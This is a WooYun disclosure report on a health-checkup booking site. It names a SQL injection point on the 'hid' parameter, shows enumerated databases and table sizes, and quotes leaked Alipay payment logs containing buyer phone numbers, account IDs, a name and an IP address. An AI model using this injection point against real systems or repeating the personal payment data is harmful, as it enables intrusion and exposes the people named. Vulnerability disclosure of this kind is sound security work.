云健康体检平台SQL注入及订单支付信息泄露/泄露用户体检信息（部分支付日志） | wooyun-2015-0101609

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0101609

漏洞标题：

云健康体检平台SQL注入及订单支付信息泄露/泄露用户体检信息（部分支付日志）

漏洞详情

披露状态：

2015-03-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某体检平台注入及订单支付信息泄露<近10W>

详细说明：

http://tijian.jiankang.cn/

http://tijian.jiankang.cn/index.php?act=category&hid=3&mod=book
参数：hid
current user: 'content@localhost'
current database: 'cn_jiankang'

available databases [21]:
[*] `114_jiankang_cn`
[*] bak_hzhailiao_com
[*] bak_hzhailiao_jiankang_cn
[*] bak_icare_jiankang_cn
[*] book_jiankang_cn
[*] bs_tjxt_scfb
[*] cn_jiankang
[*] equipments
[*] hzhailiao_com
[*] hzhailiao_jiankang_cn
[*] hzhailiao_jiankang_cn_bak
[*] hzhailiao_jiankang_cn_bak_2
[*] hzhailiao_jiankang_cn_bak_3
[*] hzlyy_com
[*] icare_jiankang_cn
[*] information_schema
[*] lyy_jiankang_cn
[*] mysql
[*] report_hzhailiao
[*] yls0804
[*] ylscn_jiankang

支付信息：

http://tijian.jiankang.cn/alipay_jk/log.txt

漏洞证明：

Database: cn_jiankang
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| check_yuyue_detail       | 97457   |
| check_category_items     | 18058   |
| member_login_log         | 12877   |
| member                   | 7504    |
| member_info              | 7492    |
| company_member           | 5846    |
| member_to_check          | 5040    |
| member_money_log         | 4297    |
| hn_region                | 3507    |
| check_yuyue_pdetail      | 3160    |
| check_yuyue              | 3018    |
| member_to_website        | 2798    |
| check_report_items       | 2241    |
| check_items              | 2221    |
| mobile_sms_log           | 1800    |
| member_to_wechat         | 1686    |
| gd_mobile_sms            | 1305    |
| minfo_groups_func        | 700     |
| gd_doctors               | 590     |
| wx_message               | 522     |
| website_news             | 514     |
| website_news_content     | 452     |
| check_category           | 422     |
| check_report_category    | 380     |
| member_passwd_change     | 215     |
| minfo_func               | 177     |
| operate_log              | 171     |
| gd_departments_hospitals | 155     |
| gd_order                 | 155     |
| member_friends           | 146     |
| member_to_groups         | 125     |
| gd_departments           | 110     |
| wx_member                | 110     |
| minfo_priv               | 106     |
| gd_payment_log           | 96      |
| manage_each_nums         | 94      |
| member_remember          | 90      |
| website_to_hospital      | 79      |
| company                  | 74      |
| member_login_change      | 63      |
| minfo_groups             | 56      |
| member_mobile_auth       | 43      |
| message                  | 42      |
| hospital                 | 32      |
| gd_refund_log            | 31      |
| member_integration       | 30      |
| check_lodgings           | 28      |
| website_news_category    | 27      |
| pics                     | 23      |
| company_department       | 21      |
| `---member_to_check`     | 18      |
| check_report             | 17      |
| gd_hospital              | 16      |
| task_his                 | 16      |
| website                  | 15      |
| wx_menu                  | 15      |
| manage_nums              | 13      |
| task                     | 13      |
| wx_bk                    | 12      |
| menu                     | 11      |
| wx_hub                   | 11      |
| gd_wechat_qrcode         | 9       |
| mobile_sms_tmpl          | 8       |
| zz_priv                  | 8       |
| wx_news                  | 6       |
| ask_as                   | 5       |
| bk_hub                   | 5       |
| gd_category              | 5       |
| manage_default           | 5       |
| gd_check_items           | 4       |
| gd_wechat_news           | 4       |
| member_cards             | 4       |
| business_cards           | 3       |
| check_category_key       | 2       |
| check_category_link      | 2       |
| feedback                 | 2       |
| gd_check_ways            | 2       |
| wx_keywords              | 2       |
| wx_wechat                | 2       |
| ask                      | 1       |
| gd_wechat_autoreply      | 1       |
| wx_ad                    | 1       |
+--------------------------+---------+

notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141107706&buyer_email=15158114124&gmt_create=2014-03-21 17:07:55&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321170659780&seller_id=2088011023450435&notify_time=2014-03-21 17:08:12&body=114号码百事通-解放军杭州疗养院(201403211609)&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 17:08:12&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=a0cd3cdc72126482202fe434f97f817f2c&use_coupon=N&sign_type=MD5&sign=44a1767f8c82b2b5d65674462f6261c2
执行日期：20140321173436
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141274806&buyer_email=15158114124&gmt_create=2014-03-21 17:34:42&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321173331519&seller_id=2088011023450435&notify_time=2014-03-21 17:34:59&body=114号码百事通-解放军杭州疗养院(201403211609)&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 17:34:59&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=ca39c25525946ad84404b06a0ce17aab2c&use_coupon=N&sign_type=MD5&sign=0bee3599e7756b3e48649c344ae2ebdd
执行日期：20140321174213
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141321306&buyer_email=15158114124&gmt_create=2014-03-21 17:42:21&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321174124492&seller_id=2088011023450435&notify_time=2014-03-21 17:42:37&body=114号码百事通-解放军杭州疗养院(201403211609)&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 17:42:36&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=3fc1f61880e51709938da1e0de8ef8862c&use_coupon=N&sign_type=MD5&sign=f65fa4f5502ac7277a89bb8e0a62dcc6
执行日期：20140321175831
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141423306&buyer_email=15158114124&gmt_create=2014-03-21 17:58:41&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321175748179&seller_id=2088011023450435&notify_time=2014-03-21 17:58:55&body=201403211609|33673|61&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 17:58:54&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=5d4b0cd9876ef747a1e2407754f7c4be2c&use_coupon=N&sign_type=MD5&sign=4991868ee268c3014eead8817c5eb198
执行日期：20140321180512
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141467906&buyer_email=15158114124&gmt_create=2014-03-21 18:05:21&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321180422449&seller_id=2088011023450435&notify_time=2014-03-21 18:05:36&body=201403211609|33673|61&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:05:36&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=99fdb96834be955e2e528d77f607310a2c&use_coupon=N&sign_type=MD5&sign=1b809dc2e8e70778aa39363eee59ae48
执行日期：20140321180512
执行日期：20140321181125
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141507406&buyer_email=15158114124&gmt_create=2014-03-21 18:11:37&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321180959234&seller_id=2088011023450435&notify_time=2014-03-21 18:11:49&body=201403211609|33673|61&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:11:49&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=4373fb524e17079d9fcf6f0d8775ea422c&use_coupon=N&sign_type=MD5&sign=b1678317ce19409ec72f97400d771f44
执行日期：20140321181125
执行日期：20140321181702
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141545506&buyer_email=15158114124&gmt_create=2014-03-21 18:17:15&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321181553152&seller_id=2088011023450435&notify_time=2014-03-21 18:17:26&body=201403211609|33673|61|122.224.162.212&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:17:26&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=05d9d34ec48addb035ad39b4e20635792c&use_coupon=N&sign_type=MD5&sign=251d5431779f0dc96467f3924bc7edf8
执行日期：20140321181702
执行日期：20140321182537
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-解放军杭州疗养院(201403211609)&trade_no=2014032141598206&buyer_email=15158114124&gmt_create=2014-03-21 18:25:48&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321182453447&seller_id=2088011023450435&notify_time=2014-03-21 18:26:01&body=201403211609|33673|61|122.224.162.212&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:26:01&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=e48852c0f72ff2a955f05d77340a1cd32c&use_coupon=N&sign_type=MD5&sign=d2bdf370a317b7a20a3636d6ee22eb20
执行日期：20140321182537
执行日期：20140321183709
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=一生健康2.0-解放军杭州疗养院(201402131391)&trade_no=2014032141669506&buyer_email=15158114124&gmt_create=2014-03-21 18:37:15&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321183617834&seller_id=2088011023450435&notify_time=2014-03-21 18:37:33&body=201402131391|33673|54|122.224.162.212&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:37:33&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=c84d668a73a0fc3a8ea2fc184328da5c2c&use_coupon=N&sign_type=MD5&sign=43fb4049ec6abeb94f0a84d3392ea4e5
执行日期：20140321183709
执行日期：20140321185319
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=一生健康2.0-张三(15158114124)&trade_no=2014032141770106&buyer_email=15158114124&gmt_create=2014-03-21 18:53:30&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321185215228&seller_id=2088011023450435&notify_time=2014-03-21 18:53:42&body=|33673|54|122.224.162.212&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:53:42&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=000352c401d7fd3b5855b06bc8e30edb2c&use_coupon=N&sign_type=MD5&sign=778dfeee6423fb25f0d5855b97f72a33
执行日期：20140321185319
执行日期：20140321185656
responseTxt=true
 notify_url_log:isSign=true,discount=0.00&payment_type=1&subject=114号码百事通-张三(15158114124)&trade_no=2014032141791806&buyer_email=15158114124&gmt_create=2014-03-21 18:57:02&notify_type=trade_status_sync&quantity=1&out_trade_no=20140321185608166&seller_id=2088011023450435&notify_time=2014-03-21 18:57:15&body=|33673|61|122.224.162.212&trade_status=TRADE_SUCCESS&is_total_fee_adjust=N&total_fee=0.01&gmt_payment=2014-03-21 18:57:15&seller_email=ht08@netsun.com&price=0.01&buyer_id=2088702406658068&notify_id=e23ffa6df9a71fbf2b3b1e677e5fe7b62c&use_coupon=N&sign_type=MD5&sign=609a80795327b724fbffbd570bb1c694
执行日期：20140321185656
执行日期：20140321190807
responseTxt=true

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 BMa@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞